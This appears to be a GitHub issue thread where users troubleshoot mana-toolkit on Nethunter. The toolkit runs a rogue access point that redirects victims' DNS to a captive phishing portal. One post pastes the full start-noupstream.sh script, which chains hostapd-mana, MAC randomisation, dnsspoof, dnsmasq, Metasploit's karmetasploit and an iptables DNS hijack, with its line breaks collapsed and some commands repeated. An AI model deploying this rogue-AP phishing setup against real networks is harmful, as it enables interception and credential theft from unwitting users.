Open HeavensWing opened 7 years ago
same with me can you help us with this I am runnin it also on Nethunter . i can connect to the phone but cant ping the captive portal 10.0.0.1 thanks in advance.
Hey I am not the dev who made this but from some debugging, I noticed there is a issue with the DNS redirection. At least you managed to get the IP leases fixed. I am assuming you are running the /usr/share/mana-toolkit/run-mana/start-noupstream.sh
By default it is supposed to use DNSMasq and Metasploit's FakeDNS module for the redirection. It tells msfconsole to run this file /etc/mana-toolkit/karmetasploit.rc
It already has the proper pointers, basically saying "all traffic from DNS requests goes to 10.0.0.1", or "phishing page".
The pointer is here: dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf inside of the file: /usr/share/mana-toolkit/run-mana/start-noupstream.sh
The file is located here: /etc/mana-toolkit/dnsspoof.conf
It does the same thing, again, in Metasploit with the auxiliary/server/fakedns module. But in the latest version of the karmetasploit resource script, it appears it got commented out. https://github.com/sensepost/mana/commit/8c0286c8e69219a53e2b1351d6ce73957e506e5c
I been trying other methods, like attempting to use DNSChef instead. But then it locks out DNSMasq because its fighting for the same port and host.
However, the with-uplink attack works perfectly, but using the no-uplink attack with a captive phishing portal seems to have DNS issues. I tried running "host", "nslookup", and "dig" and it keeps resolving to the real legitimate IP address.
I'm running Nethunter on an S7E with TL-722n.
When running start-noupstream.sh everything seems fine, the AP comes up and everything as it should. For a short period of time, I can connect with my laptop and hit an http site and be redirected to my captive portal. This all has to be done within about 5-10 seconds. After that AP shows "No internet connectivity" on the laptop and I can't reach the site even by using the 10.0.0.1 address. I can't ping the gateway either.
I cleared all the iptables thinking that an incoming connection was being blocked yet it didn't help.
I setup the same exact test in a VM on my laptop and everything works fine, so I don't know what's stopping my phone from working.
What is also strange, if I connect to the AP via my phone (same device as I'm running the test.) I can reach the page using the address 10.0.0.1.
/usr/share/mana-toolkit/run-mana/start-noupstream.sh ::::::::::::::
!/bin/bash
phy=wlan1 conf=/etc/mana-toolkit/hostapd-mana.conf hostapd=/usr/lib/mana-toolkit/hostapd
hostname WRT54G echo hostname WRT54G sleep 2
service network-manager stop rfkill unblock wlan
ifconfig $phy down macchanger -r $phy ifconfig $phy up
sed -i "s/^interface=.$/interface=$phy/" $conf sed -i "s/^set INTERFACE .$/set INTERFACE $phy/" /etc/mana-toolkit/karmetasploit.rc $hostapd $conf& sleep 5 ifconfig $phy 10.0.0.1 netmask 255.255.255.0 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf& dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf& service apache2 start stunnel4 /etc/mana-toolkit/stunnel.conf tinyproxy -c /etc/mana-toolkit/tinyproxy.conf& msfconsole -r /etc/mana-toolkit/karmetasploit.rc&
echo '1' > /proc/sys/net/ipv4/ip_forward iptables --policy INPUT ACCEPT iptables --policy FORWARD ACCEPT iptables --policy OUTPUT ACCEPT iptables -F iptables -t nat -F iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1
echo "Hit enter to kill me" read pkill hostapd pkill dnsmasq pkill dnsspoof pkill tinyproxy pkill stunnel4 pkill ruby service apache2 stop iptables -t nat -F